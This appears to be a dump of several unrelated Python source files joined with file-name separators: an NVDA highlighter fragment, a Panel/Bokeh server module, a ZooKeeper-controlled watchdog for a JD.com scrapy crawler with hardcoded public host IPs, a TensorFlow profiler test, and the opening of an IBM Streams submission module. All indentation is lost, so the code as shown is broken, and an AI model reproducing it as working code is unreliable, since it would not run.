if vision._isDebug():
log.debug("Quit message received on NVDAHighlighter thread")
if self.timer:
self.timer.terminate()
self.timer = None
if self.window:
self.window.destroy()
self.window = None
def updateContextRect(self, context, rect=None, obj=None):
"""Updates the position rectangle of the highlight for the specified context.
If rect is specified, the method directly writes the rectangle to the contextToRectMap.
Otherwise, it will call L{getContextRect}
"""
if context not in self.enabledContexts:
return
if rect is None:
try:
rect = getContextRect(context, obj=obj)
except (LookupError, NotImplementedError, RuntimeError, TypeError):
rect = None
self.contextToRectMap[context] = rect
def handleFocusChange(self, obj):
self.updateContextRect(context=Context.FOCUS, obj=obj)
if not api.isObjectInActiveTreeInterceptor(obj):
self.contextToRectMap.pop(Context.BROWSEMODE, None)
else:
self.handleBrowseModeMove()
def handleReviewMove(self, context):
self.updateContextRect(context=Context.NAVIGATOR)
def handleBrowseModeMove(self, obj=None):
self.updateContextRect(context=Context.BROWSEMODE)
def refresh(self):
"""Refreshes the screen positions of the enabled highlights.
"""
if self.window:
self.window.refresh()
def _get_enabledContexts(self):
"""Gets the contexts for which the highlighter is enabled.
"""
return tuple(
context for context in self.supportedContexts
if getattr(self, 'highlight%s' % (context[0].upper() + context[1:]))
)
|
server.py
|
"""
Utilities for creating bokeh Server instances.
"""
import datetime as dt
import html
import inspect
import logging
import os
import pathlib
import signal
import sys
import traceback
import threading
import uuid
from collections import OrderedDict
from contextlib import contextmanager
from functools import partial, wraps
from types import FunctionType, MethodType
from urllib.parse import urljoin, urlparse
import param
import bokeh
import bokeh.command.util
# Bokeh imports
from bokeh.application import Application as BkApplication
from bokeh.application.handlers.code import CodeHandler, _monkeypatch_io, patch_curdoc
from bokeh.application.handlers.function import FunctionHandler
from bokeh.command.util import build_single_handler_application
from bokeh.core.templates import AUTOLOAD_JS
from bokeh.document.events import ModelChangedEvent
from bokeh.embed.bundle import Script
from bokeh.embed.elements import html_page_for_render_items, script_for_render_items
from bokeh.embed.util import RenderItem
from bokeh.io import curdoc
from bokeh.server.server import Server
from bokeh.server.urls import per_app_patterns, toplevel_patterns
from bokeh.server.views.autoload_js_handler import AutoloadJsHandler as BkAutoloadJsHandler
from bokeh.server.views.doc_handler import DocHandler as BkDocHandler
from bokeh.server.views.root_handler import RootHandler as BkRootHandler
from bokeh.server.views.static_handler import StaticHandler
# Tornado imports
from tornado.ioloop import IOLoop
from tornado.websocket import WebSocketHandler
from tornado.web import RequestHandler, StaticFileHandler, authenticated
from tornado.wsgi import WSGIContainer
# Internal imports
from ..util import edit_readonly
from .logging import LOG_SESSION_CREATED, LOG_SESSION_DESTROYED, LOG_SESSION_LAUNCHING
from .profile import profile_ctx
from .reload import autoreload_watcher
from .resources import BASE_TEMPLATE, Resources, bundle_resources
from .state import set_curdoc, state
logger = logging.getLogger(__name__)
#---------------------------------------------------------------------
# Private API
#---------------------------------------------------------------------
INDEX_HTML = os.path.join(os.path.dirname(__file__), '..', '_templates', "index.html")
def _origin_url(url):
if url.startswith("http"):
url = url.split("//")[1]
return url
def _server_url(url, port):
if url.startswith("http"):
return '%s:%d%s' % (url.rsplit(':', 1)[0], port, "/")
else:
return 'http://%s:%d%s' % (url.split(':')[0], port, "/")
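# For example, _server_url("localhost", 5006) gives "http://localhost:5006/",
# while _server_url("http://localhost:8000", 5006) rewrites the port and gives
# "http://localhost:5006/".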
def _eval_panel(panel, server_id, title, location, doc):
from ..template import BaseTemplate
from ..pane import panel as as_panel
with set_curdoc(doc):
if isinstance(panel, (FunctionType, MethodType)):
panel = panel()
if isinstance(panel, BaseTemplate):
doc = panel._modify_doc(server_id, title, doc, location)
else:
doc = as_panel(panel)._modify_doc(server_id, title, doc, location)
return doc
def async_execute(func):
"""
Wrap async event-loop scheduling to ensure that the with_lock flag
is propagated from the function to the partial wrapping it.
"""
if not state.curdoc or not state.curdoc.session_context:
ioloop = IOLoop.current()
event_loop = ioloop.asyncio_loop
if event_loop.is_running():
ioloop.add_callback(func)
else:
event_loop.run_until_complete(func())
return
if isinstance(func, partial) and hasattr(func.func, 'lock'):
unlock = not func.func.lock
else:
unlock = not getattr(func, 'lock', False)
curdoc = state.curdoc
@wraps(func)
async def wrapper(*args, **kw):
with set_curdoc(curdoc):
return await func(*args, **kw)
if unlock:
wrapper.nolock = True
state.curdoc.add_next_tick_callback(wrapper)
param.parameterized.async_executor = async_execute
def _initialize_session_info(session_context):
from ..config import config
session_id = session_context.id
sessions = state.session_info['sessions']
history = -1 if config._admin else config.session_history
if not config._admin and (history == 0 or session_id in sessions):
return
state.session_info['total'] += 1
if history > 0 and len(sessions) >= history:
old_history = list(sessions.items())
sessions = OrderedDict(old_history[-(history-1):])
state.session_info['sessions'] = sessions
sessions[session_id] = {
'launched': dt.datetime.now().timestamp(),
'started': None,
'rendered': None,
'ended': None,
'user_agent': session_context.request.headers.get('User-Agent')
}
state.param.trigger('session_info')
state.on_session_created(_initialize_session_info)
#---------------------------------------------------------------------
# Bokeh patches
#---------------------------------------------------------------------
def server_html_page_for_session(session, resources, title, template=BASE_TEMPLATE,
template_variables=None):
render_item = RenderItem(
token = session.token,
roots = session.document.roots,
use_for_title = False,
)
if template_variables is None:
template_variables = {}
bundle = bundle_resources(session.document.roots, resources)
return html_page_for_render_items(bundle, {}, [render_item], title,
template=template, template_variables=template_variables)
def autoload_js_script(doc, resources, token, element_id, app_path, absolute_url):
resources = Resources.from_bokeh(resources)
bundle = bundle_resources(doc.roots, resources)
render_items = [RenderItem(token=token, elementid=element_id, use_for_title=False)]
bundle.add(Script(script_for_render_items({}, render_items, app_path=app_path, absolute_url=absolute_url)))
return AUTOLOAD_JS.render(bundle=bundle, elementid=element_id)
# Patch Application to handle session callbacks
class Application(BkApplication):
async def on_session_created(self, session_context):
for cb in state._on_session_created:
cb(session_context)
await super().on_session_created(session_context)
def initialize_document(self, doc):
super().initialize_document(doc)
if doc in state._templates:
template = state._templates[doc]
template.server_doc(title=template.title, location=True, doc=doc)
bokeh.command.util.Application = Application
class SessionPrefixHandler:
@contextmanager
def _session_prefix(self):
prefix = self.request.uri.replace(self.application_context._url, '')
if not prefix.endswith('/'):
prefix += '/'
base_url = urljoin('/', prefix)
rel_path = '/'.join(['..'] * self.application_context._url.strip('/').count('/'))
old_url, old_rel = state.base_url, state.rel_path
# Handle autoload.js absolute paths
abs_url = self.get_argument('bokeh-absolute-url', default=None)
if abs_url is not None:
app_path = self.get_argument('bokeh-app-path', default='')
rel_path = abs_url.replace(app_path, '')
with edit_readonly(state):
state.base_url = base_url
state.rel_path = rel_path
try:
yield
finally:
with edit_readonly(state):
state.base_url = old_url
state.rel_path = old_rel
# Patch Bokeh DocHandler URL
class DocHandler(BkDocHandler, SessionPrefixHandler):
@authenticated
async def get(self, *args, **kwargs):
with self._session_prefix():
session = await self.get_session()
state.curdoc = session.document
logger.info(LOG_SESSION_CREATED, id(session.document))
try:
resources = Resources.from_bokeh(self.application.resources())
page = server_html_page_for_session(
session, resources=resources, title=session.document.title,
template=session.document.template,
template_variables=session.document.template_variables
)
finally:
state.curdoc = None
self.set_header("Content-Type", 'text/html')
self.write(page)
per_app_patterns[0] = (r'/?', DocHandler)
# Patch Bokeh Autoload handler
class AutoloadJsHandler(BkAutoloadJsHandler, SessionPrefixHandler):
''' Implements a custom Tornado handler for the autoload JS chunk
'''
async def get(self, *args, **kwargs):
element_id = self.get_argument("bokeh-autoload-element", default=None)
if not element_id:
self.send_error(status_code=400, reason='No bokeh-autoload-element query parameter')
return
app_path = self.get_argument("bokeh-app-path", default="/")
absolute_url = self.get_argument("bokeh-absolute-url", default=None)
if absolute_url:
server_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(absolute_url))
else:
server_url = None
with self._session_prefix():
session = await self.get_session()
state.curdoc = session.document
try:
resources = Resources.from_bokeh(self.application.resources(server_url))
js = autoload_js_script(
session.document, resources, session.token, element_id,
app_path, absolute_url
)
finally:
state.curdoc = None
self.set_header("Content-Type", 'application/javascript')
self.write(js)
per_app_patterns[3] = (r'/autoload.js', AutoloadJsHandler)
class RootHandler(BkRootHandler):
@authenticated
async def get(self, *args, **kwargs):
if self.index and not self.index.endswith('.html'):
prefix = "" if self.prefix is None else self.prefix
redirect_to = prefix + '.'.join(self.index.split('.')[:-1])
self.redirect(redirect_to)
await super().get(*args, **kwargs)
toplevel_patterns[0] = (r'/?', RootHandler)
bokeh.server.tornado.RootHandler = RootHandler
def modify_document(self, doc):
from bokeh.io.doc import set_curdoc as bk_set_curdoc
from ..config import config
logger.info(LOG_SESSION_LAUNCHING, id(doc))
if config.autoreload:
path = self._runner.path
argv = self._runner._argv
handler = type(self)(filename=path, argv=argv)
self._runner = handler._runner
module = self._runner.new_module()
# If no module was returned it means the code runner has some permanent
# unfixable problem, e.g. the configured source code has a syntax error
if module is None:
return
# One reason modules are stored is to prevent the module
# from being gc'd before the document is. A symptom of a
# gc'd module is that its globals become None. Additionally
# stored modules are used to provide correct paths to
# custom models resolver.
sys.modules[module.__name__] = module
doc.modules._modules.append(module)
old_doc = curdoc()
bk_set_curdoc(doc)
if config.autoreload:
set_curdoc(doc)
state.onload(autoreload_watcher)
sessions = []
try:
def post_check():
newdoc = curdoc()
# Do not let curdoc track modules when autoreload is enabled
# otherwise it will erroneously complain that there is
# a memory leak
if config.autoreload:
newdoc.modules._modules = []
# script is supposed to edit the doc not replace it
if newdoc is not doc:
raise RuntimeError("%s at '%s' replaced the output document" % (self._origin, self._runner.path))
def handle_exception(handler, e):
from bokeh.application.handlers.handler import handle_exception
from ..pane import HTML
# Clean up
del sys.modules[module.__name__]
if hasattr(doc, 'modules'):
doc.modules._modules.remove(module)
else:
doc._modules.remove(module)
bokeh.application.handlers.code_runner.handle_exception = handle_exception
tb = html.escape(traceback.format_exc())
# Serve error
HTML(
f'<b>{type(e).__name__}</b>: {e}</br><pre style="overflow-y: scroll">{tb}</pre>',
css_classes=['alert', 'alert-danger'], sizing_mode='stretch_width'
).servable()
if config.autoreload:
bokeh.application.handlers.code_runner.handle_exception = handle_exception
state._launching.append(doc)
with _monkeypatch_io(self._loggers):
with patch_curdoc(doc):
with profile_ctx(config.profiler) as sessions:
self._runner.run(module, post_check)
def _log_session_destroyed(session_context):
logger.info(LOG_SESSION_DESTROYED, id(doc))
doc.on_session_destroyed(_log_session_destroyed)
finally:
state._launching.remove(doc)
if config.profiler:
try:
path = doc.session_context.request.path
state._profiles[(path, config.profiler)] += sessions
state.param.trigger('_profiles')
except Exception:
pass
bk_set_curdoc(old_doc)
CodeHandler.modify_document = modify_document
# Copied from bokeh 2.4.0, to fix directly in bokeh at some point.
def create_static_handler(prefix, key, app):
# patch
key = '/__patchedroot' if key == '/' else key
route = prefix
route += "/static/(.*)" if key == "/" else key + "/static/(.*)"
if app.static_path is not None:
return (route, StaticFileHandler, {"path" : app.static_path})
return (route, StaticHandler, {})
bokeh.server.tornado.create_static_handler = create_static_handler
#---------------------------------------------------------------------
# Public API
#---------------------------------------------------------------------
def init_doc(doc):
doc = doc or curdoc()
if not doc.session_context:
return doc
thread = threading.current_thread()
if thread:
with set_curdoc(doc):
state._thread_id = thread.ident
session_id = doc.session_context.id
sessions = state.session_info['sessions']
if session_id not in sessions:
return doc
sessions[session_id].update({
'started': dt.datetime.now().timestamp()
})
doc.on_event('document_ready', state._init_session)
return doc
def with_lock(func):
"""
Wrap a callback function to execute with a lock allowing the
function to modify bokeh models directly.
Arguments
---------
func: callable
The callable to wrap
Returns
-------
wrapper: callable
Function wrapped to execute while holding the Document lock.
"""
if inspect.iscoroutinefunction(func):
@wraps(func)
async def wrapper(*args, **kw):
return await func(*args, **kw)
else:
@wraps(func)
def wrapper(*args, **kw):
return func(*args, **kw)
wrapper.lock = True
return wrapper
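# A minimal usage sketch (hypothetical callback and data source names):
# decorating a callback with `with_lock` marks it to run while the Document
# lock is held, so it may mutate bokeh models directly.
#
#     @with_lock
#     def update_plot():
#         source.data = {'x': [0, 1], 'y': [1, 0]}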
def _dispatch_events(doc, events):
"""
Handles dispatch of events which could not be processed in
unlocked decorator.
"""
for event in events:
doc.callbacks.trigger_on_change(event)
@contextmanager
def unlocked():
"""
Context manager which unlocks a Document and dispatches
ModelChangedEvents triggered in the context body to all sockets
on current sessions.
"""
curdoc = state.curdoc
if curdoc is None or curdoc.session_context is None or curdoc.session_context.session is None:
yield
return
connections = curdoc.session_context.session._subscribed_connections
hold = curdoc.callbacks.hold_value
if hold:
old_events = list(curdoc.callbacks._held_events)
else:
old_events = []
curdoc.hold()
try:
yield
locked = False
for conn in connections:
socket = conn._socket
if hasattr(socket, 'write_lock') and socket.write_lock._block._value == 0:
locked = True
break
events = []
for event in curdoc.callbacks._held_events:
if not isinstance(event, ModelChangedEvent) or event in old_events or locked:
events.append(event)
continue
for conn in connections:
socket = conn._socket
ws_conn = getattr(socket, 'ws_connection', False)
if (not hasattr(socket, 'write_message') or
ws_conn is None or (ws_conn and ws_conn.is_closing())):
continue
msg = conn.protocol.create('PATCH-DOC', [event])
WebSocketHandler.write_message(socket, msg.header_json)
WebSocketHandler.write_message(socket, msg.metadata_json)
WebSocketHandler.write_message(socket, msg.content_json)
for header, payload in msg._buffers:
WebSocketHandler.write_message(socket, header)
WebSocketHandler.write_message(socket, payload, binary=True)
curdoc.callbacks._held_events = events
finally:
if hold:
return
try:
curdoc.unhold()
except RuntimeError:
curdoc.add_next_tick_callback(partial(_dispatch_events, curdoc, events))
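# A minimal usage sketch (hypothetical `slider` model): property changes made
# inside the context are pushed to the connected websockets as PATCH-DOC
# messages instead of waiting for the Document lock to be released.
#
#     with unlocked():
#         slider.value = 5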
def serve(panels, port=0, address=None, websocket_origin=None, loop=None,
show=True, start=True, title=None, verbose=True, location=True,
threaded=False, **kwargs):
"""
Allows serving one or more panel objects on a single server.
The panels argument should be either a Panel object or a function
returning a Panel object or a dictionary of these two. If a
dictionary is supplied the keys represent the slugs at which
each app is served, e.g. `serve({'app': panel1, 'app2': panel2})`
will serve apps at /app and /app2 on the server.
Arguments
---------
panel: Viewable, function or {str: Viewable or function}
A Panel object, a function returning a Panel object or a
dictionary mapping from the URL slug to either.
port: int (optional, default=0)
Allows specifying a specific port
address : str
The address the server should listen on for HTTP requests.
websocket_origin: str or list(str) (optional)
A list of hosts that can connect to the websocket.
This is typically required when embedding a server app in
an external web site.
If None, "localhost" is used.
loop : tornado.ioloop.IOLoop (optional, default=IOLoop.current())
The tornado IOLoop to run the Server on
show : boolean (optional, default=True)
Whether to open the server in a new browser tab on start
start : boolean(optional, default=True)
Whether to start the Server
title: str or {str: str} (optional, default=None)
An HTML title for the application or a dictionary mapping
from the URL slug to a customized title
verbose: boolean (optional, default=True)
Whether to print the address and port
location : boolean or panel.io.location.Location
Whether to create a Location component to observe and
set the URL location.
threaded: boolean (default=False)
Whether to start the server on a new Thread
kwargs: dict
Additional keyword arguments to pass to Server instance
"""
kwargs = dict(kwargs, **dict(
port=port, address=address, websocket_origin=websocket_origin,
loop=loop, show=show, start=start, title=title, verbose=verbose,
location=location
))
if threaded:
from tornado.ioloop import IOLoop
kwargs['loop'] = loop = IOLoop() if loop is None else loop
server = StoppableThread(
target=get_server, io_loop=loop, args=(panels,), kwargs=kwargs
)
server_id = kwargs.get('server_id', uuid.uuid4().hex)
state._threads[server_id] = server
server.start()
else:
server = get_server(panels, **kwargs)
return server
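# A minimal usage sketch (hypothetical `panel1`/`panel2` objects), mirroring
# the docstring above:
#
#     serve({'app': panel1, 'app2': panel2}, port=5006, show=False)
#
# serves the two apps at /app and /app2 on the same server; pass
# threaded=True to run the server on a separate StoppableThread.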
class ProxyFallbackHandler(RequestHandler):
"""A `RequestHandler` that wraps another HTTP server callback and
proxies the subpath.
"""
def initialize(self, fallback, proxy=None):
self.fallback = fallback
self.proxy = proxy
def prepare(self):
if self.proxy:
self.request.path = self.request.path.replace(self.proxy, '')
self.fallback(self.request)
self._finished = True
self.on_finish()
def get_static_routes(static_dirs):
"""
Returns a list of tornado routes of StaticFileHandlers given a
dictionary of slugs and file paths to serve.
"""
patterns = []
for slug, path in static_dirs.items():
if not slug.startswith('/'):
slug = '/' + slug
if slug == '/static':
raise ValueError("Static file route may not use /static "
"this is reserved for internal use.")
path = os.path.abspath(path)
if not os.path.isdir(path):
raise ValueError("Cannot serve non-existent path %s" % path)
patterns.append(
(r"%s/(.*)" % slug, StaticFileHandler, {"path": path})
)
return patterns
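# A minimal sketch (hypothetical directory name): calling
# get_static_routes({'assets': './assets'}) yields a single pattern
# (r"/assets/(.*)", StaticFileHandler, {"path": os.path.abspath('./assets')}),
# provided ./assets exists and is a directory.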
def get_server(panel, port=0, address=None, websocket_origin=None,
loop=None, show=False, start=False, title=None,
verbose=False, location=True, static_dirs={},
oauth_provider=None, oauth_key=None, oauth_secret=None,
oauth_extra_params={}, cookie_secret=None,
oauth_encryption_key=None, session_history=None, **kwargs):
"""
Returns a Server instance with this panel attached as the root
app.
Arguments
---------
panel: Viewable, function or {str: Viewable}
A Panel object, a function returning a Panel object or a
dictionary mapping from the URL slug to either.
port: int (optional, default=0)
Allows specifying a specific port
address : str
The address the server should listen on for HTTP requests.
websocket_origin: str or list(str) (optional)
A list of hosts that can connect to the websocket.
This is typically required when embedding a server app in
an external web site.
If None, "localhost" is used.
loop : tornado.ioloop.IOLoop (optional, default=IOLoop.current())
The tornado IOLoop to run the Server on.
show : boolean (optional, default=False)
Whether to open the server in a new browser tab on start.
start : boolean(optional, default=False)
Whether to start the Server.
title : str or {str: str} (optional, default=None)
An HTML title for the application or a dictionary mapping
from the URL slug to a customized title.
verbose: boolean (optional, default=False)
Whether to report the address and port.
location : boolean or panel.io.location.Location
Whether to create a Location component to observe and
set the URL location.
static_dirs: dict (optional, default={})
A dictionary of routes and local paths to serve as static file
directories on those routes.
oauth_provider: str
One of the available OAuth providers
oauth_key: str (optional, default=None)
The public OAuth identifier
oauth_secret: str (optional, default=None)
The client secret for the OAuth provider
oauth_extra_params: dict (optional, default={})
Additional information for the OAuth provider
cookie_secret: str (optional, default=None)
A random secret string to sign cookies (required for OAuth)
oauth_encryption_key: str (optional, default=False)
A random encryption key used for encrypting OAuth user
information and access tokens.
session_history: int (optional, default=None)
The amount of session history to accumulate. If set to a non-zero,
non-None value, a REST endpoint is launched at
/rest/session_info, which returns information about the session
history.
kwargs: dict
Additional keyword arguments to pass to Server instance.
Returns
-------
server : bokeh.server.server.Server
Bokeh Server instance running this panel
"""
from ..config import config
from .rest import REST_PROVIDERS
server_id = kwargs.pop('server_id', uuid.uuid4().hex)
kwargs['extra_patterns'] = extra_patterns = kwargs.get('extra_patterns', [])
if isinstance(panel, dict):
apps = {}
for slug, app in panel.items():
if isinstance(title, dict):
try:
title_ = title[slug]
except KeyError:
raise KeyError(
"Keys of the title dictionnary and of the apps "
f"dictionary must match. No {slug} key found in the "
"title dictionary.")
else:
title_ = title
slug = slug if slug.startswith('/') else '/'+slug
if 'flask' in sys.modules:
from flask import Flask
if isinstance(app, Flask):
wsgi = WSGIContainer(app)
if slug == '/':
raise ValueError('Flask apps must be served on a subpath.')
if not slug.endswith('/'):
slug += '/'
extra_patterns.append(('^'+slug+'.*', ProxyFallbackHandler,
dict(fallback=wsgi, proxy=slug)))
continue
if isinstance(app, pathlib.Path):
app = str(app) # enables serving apps from Paths
if (isinstance(app, str) and (app.endswith(".py") or app.endswith(".ipynb"))
and os.path.isfile(app)):
apps[slug] = build_single_handler_application(app)
else:
handler = FunctionHandler(partial(_eval_panel, app, server_id, title_, location))
apps[slug] = Application(handler)
else:
handler = FunctionHandler(partial(_eval_panel, panel, server_id, title, location))
apps = {'/': Application(handler)}
extra_patterns += get_static_routes(static_dirs)
if session_history is not None:
config.session_history = session_history
if config.session_history != 0:
pattern = REST_PROVIDERS['param']([], 'rest')
extra_patterns.extend(pattern)
state.publish('session_info', state, ['session_info'])
opts = dict(kwargs)
if loop:
loop.make_current()
opts['io_loop'] = loop
elif opts.get('num_procs', 1) == 1:
opts['io_loop'] = IOLoop.current()
if 'index' not in opts:
opts['index'] = INDEX_HTML
if address is not None:
opts['address'] = address
if websocket_origin:
if not isinstance(websocket_origin, list):
websocket_origin = [websocket_origin]
opts['allow_websocket_origin'] = websocket_origin
# Configure OAuth
from ..config import config
if config.oauth_provider:
from ..auth import OAuthProvider
opts['auth_provider'] = OAuthProvider()
if oauth_provider:
config.oauth_provider = oauth_provider
if oauth_key:
config.oauth_key = oauth_key
if oauth_extra_params:
config.oauth_extra_params = oauth_extra_params
if cookie_secret:
config.cookie_secret = cookie_secret
opts['cookie_secret'] = config.cookie_secret
server = Server(apps, port=port, **opts)
if verbose:
address = server.address or 'localhost'
url = f"http://{address}:{server.port}{server.prefix}"
print(f"Launching server at {url}")
state._servers[server_id] = (server, panel, [])
if show:
def show_callback():
server.show('/login' if config.oauth_provider else '/')
server.io_loop.add_callback(show_callback)
def sig_exit(*args, **kwargs):
server.io_loop.add_callback_from_signal(do_stop)
def do_stop(*args, **kwargs):
server.io_loop.stop()
try:
signal.signal(signal.SIGINT, sig_exit)
except ValueError:
pass # Can't use signal on a thread
if start:
server.start()
try:
server.io_loop.start()
except RuntimeError:
pass
return server
class StoppableThread(threading.Thread):
"""Thread class with a stop() method."""
def __init__(self, io_loop=None, **kwargs):
super().__init__(**kwargs)
self.io_loop = io_loop
def run(self):
if hasattr(self, '_target'):
target, args, kwargs = self._target, self._args, self._kwargs
else:
target, args, kwargs = self._Thread__target, self._Thread__args, self._Thread__kwargs
if not target:
return
bokeh_server = None
try:
bokeh_server = target(*args, **kwargs)
finally:
if isinstance(bokeh_server, Server):
try:
bokeh_server.stop()
except Exception:
pass
if hasattr(self, '_target'):
del self._target, self._args, self._kwargs
else:
del self._Thread__target, self._Thread__args, self._Thread__kwargs
def stop(self):
self.io_loop.add_callback(self.io_loop.stop)
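# Example (hedged sketch): running the server defined above on a background thread.
# ``serve_fn`` stands in for the serving function in this module; the exact
# arguments shown are illustrative only.
#
#     from tornado.ioloop import IOLoop
#     loop = IOLoop()
#     thread = StoppableThread(target=serve_fn, io_loop=loop,
#                              kwargs=dict(loop=loop, start=True, show=False))
#     thread.start()
#     ...
#     thread.stop()   # stops the IOLoop; run() then cleans up the Bokeh Server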
|
watchdog.py
|
# -*- coding: utf-8 -*-
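# Watchdog: watches the PIDs passed on the command line, relays the
# stop/start/pause/continue signals published through ZooKeeper, and restarts
# the scrapy crawl process whenever a watched process dies.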
from kazoo.client import KazooClient
import os
import logging
import time
import signal
from multiprocessing import Process
main_dir = "obj"
import sys
signal_dir = '/signal/jingdong' + '_' + sys.argv[1]
task_type = "accurate_jingdong"
keyword = sys.argv[1]
def run_proc():
    os.chdir(os.path.join(main_dir, "accurate_jingdong", "accurate_jingdong", "spiders"))
    #arg = ["HELLO", "crawl", "spider_" + task_type, "--nolog"]
    arg = ["HELLO", "crawl", "spider_" + task_type, "-a", "keywords=" + keyword]
    os.execvp("scrapy", arg)
def run_wait(a, b):
    try:
        os.waitpid(-1, os.WNOHANG)
    except Exception:
        print("no child")
signal.signal(signal.SIGCHLD, run_wait)
watchPid = []
for i in range(1,len(sys.argv)):
watchPid.append(int(sys.argv[i]))
hosts_list = ['123.206.89.123:2181', '123.207.157.135:2181', '118.89.234.46:2181']
signal_dic = {"stop":signal.SIGKILL, "start":signal.SIGCONT, "pause":signal.SIGSTOP, "continue":signal.SIGCONT}
zk = KazooClient(hosts = hosts_list)
logging.basicConfig()
zk.start()
try:
zk.create(signal_dir)
except Exception:
pass
print "watch dog working"
stop_flag = False
@zk.ChildrenWatch(signal_dir)
def signal_watch(children):
if len(children) != 0:
global watchPid
for pid in watchPid:
os.kill(pid, signal_dic[children[0]])
if children[0] == "stop":
global stop_flag
stop_flag = True
def check(pid):
global stop_flag
if stop_flag == True:
sys.exit(0)
try:
os.kill(pid, 0)
return pid
    except Exception:  # process no longer exists; restart it
p = Process(target=run_proc)
p.start()
return p.pid
while True:
print "begin check"
global stop_flag
if stop_flag == True:
sys.exit(0)
for pid in watchPid:
newpid = check(pid)
if stop_flag == True:
sys.exit(0)
if newpid != pid:
print "new process"
watchPid.remove(pid)
watchPid.append(newpid)
time.sleep(5)
|
profiler_api_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf 2.x profiler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import os
import threading
import portpicker
from tensorflow.python.distribute import collective_all_reduce_strategy as collective_strategy
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.profiler import profiler_client
from tensorflow.python.profiler import profiler_v2 as profiler
from tensorflow.python.profiler.integration_test import mnist_testing_utils
def _model_setup():
"""Set up a MNIST Keras model for testing purposes.
Builds a MNIST Keras model and returns model information.
Returns:
    A tuple of (batch_size, steps, train_dataset, model)
"""
context.set_log_device_placement(True)
batch_size = 64
steps = 2
with collective_strategy.CollectiveAllReduceStrategy().scope():
# TODO(b/142509827): In rare cases this errors out at C++ level with the
# "Connect failed" error message.
train_ds, _ = mnist_testing_utils.mnist_synthetic_dataset(batch_size, steps)
model = mnist_testing_utils.get_mnist_model((28, 28, 1))
return batch_size, steps, train_ds, model
def _make_temp_log_dir(test_obj):
return test_obj.get_temp_dir()
class ProfilerApiTest(test_util.TensorFlowTestCase):
def _check_tools_pb_exist(self, logdir):
expected_files = [
'overview_page.pb',
'input_pipeline.pb',
'tensorflow_stats.pb',
'kernel_stats.pb',
]
for file in expected_files:
path = os.path.join(logdir, 'plugins/profile/*/*{}'.format(file))
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
def test_single_worker_no_profiling(self):
"""Test single worker without profiling."""
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
def test_single_worker_sampling_mode(self):
"""Test single worker sampling mode."""
def on_worker(port):
logging.info('worker starting server on {}'.format(port))
profiler.start_server(port)
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
logging.info('worker finishing')
def on_profile(port, logdir):
# Request for 30 milliseconds of profile.
duration_ms = 30
options = profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=0,
device_tracer_level=1,
)
profiler_client.trace('localhost:{}'.format(port), logdir, duration_ms,
'', 100, options)
logdir = self.get_temp_dir()
port = portpicker.pick_unused_port()
thread_profiler = threading.Thread(target=on_profile, args=(port, logdir))
thread_worker = threading.Thread(target=on_worker, args=(port,))
thread_worker.start()
thread_profiler.start()
thread_profiler.join()
thread_worker.join(120)
self._check_tools_pb_exist(logdir)
def test_single_worker_programmatic_mode(self):
"""Test single worker programmatic mode."""
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=0,
device_tracer_level=1,
)
profiler.start(logdir, options)
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
profiler.stop()
self._check_tools_pb_exist(logdir)
if __name__ == '__main__':
multi_process_runner.test_main()
|
context.py
|
# coding=utf-8
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2015,2020
"""
Context for submission and build of topologies.
"""
__all__ = ['ContextTypes', 'ConfigParams', 'JobConfig', 'SubmissionResult', 'submit', 'build', 'run']
import logging
import os
import os.path
import shutil
import json
import platform
import subprocess
import threading
import sys
import codecs
import tempfile
import copy
import time
import warnings
import streamsx.rest
import streamsx.rest_primitives
import streamsx._streams._version
import urllib.parse as up
__version__ = streamsx._streams._version.__version__
logger = logging.getLogger(__name__)
#
# Submission of a python graph using the Java Application API
# The JAA is reused to have a single set of code_createJSONFile that creates
# SPL, the toolkit, the bundle and submits it to the relevant
# environment
#
def submit(ctxtype, graph, config=None, username=None, password=None):
"""
Submits a `Topology` (application) using the specified context type.
Used to submit an application for compilation into a Streams application and
execution within an Streaming Analytics service or IBM Streams instance.
`ctxtype` defines how the application will be submitted, see :py:class:`ContextTypes`.
The parameters `username` and `password` are only required when submitting to an
IBM Streams instance and it is required to access the Streams REST API from the
code performing the submit. Accessing data from views created by
:py:meth:`~streamsx.topology.topology.Stream.view` requires access to the Streams REST API.
Args:
ctxtype(str): Type of context the application will be submitted to. A value from :py:class:`ContextTypes`.
graph(Topology): The application topology to be submitted.
config(dict): Configuration for the submission, augmented with values such as a :py:class:`JobConfig` or keys from :py:class:`ConfigParams`.
username(str): Deprecated: Username for the Streams REST api. Use environment variable ``STREAMS_USERNAME`` if using user-password authentication.
password(str): Deprecated: Password for `username`. Use environment variable ``STREAMS_PASSWORD`` if using user-password authentication.
Returns:
SubmissionResult: Result of the submission. Content depends on :py:class:`ContextTypes`
constant passed as `ctxtype`.
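    Example (illustrative sketch; ``cfg`` would carry service credentials or other
    :py:class:`ConfigParams` entries)::

        from streamsx.topology.topology import Topology
        from streamsx.topology import context

        topo = Topology('SampleApp')
        # ... declare streams on topo ...
        cfg = {}
        result = context.submit(context.ContextTypes.STREAMING_ANALYTICS_SERVICE, topo, cfg)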
"""
streamsx._streams._version._mismatch_check(__name__)
graph = graph.graph
if not graph.operators:
raise ValueError("Topology {0} does not contain any streams.".format(graph.topology.name))
if username or password:
warnings.warn("Use environment variables STREAMS_USERNAME and STREAMS_PASSWORD", DeprecationWarning, stacklevel=2)
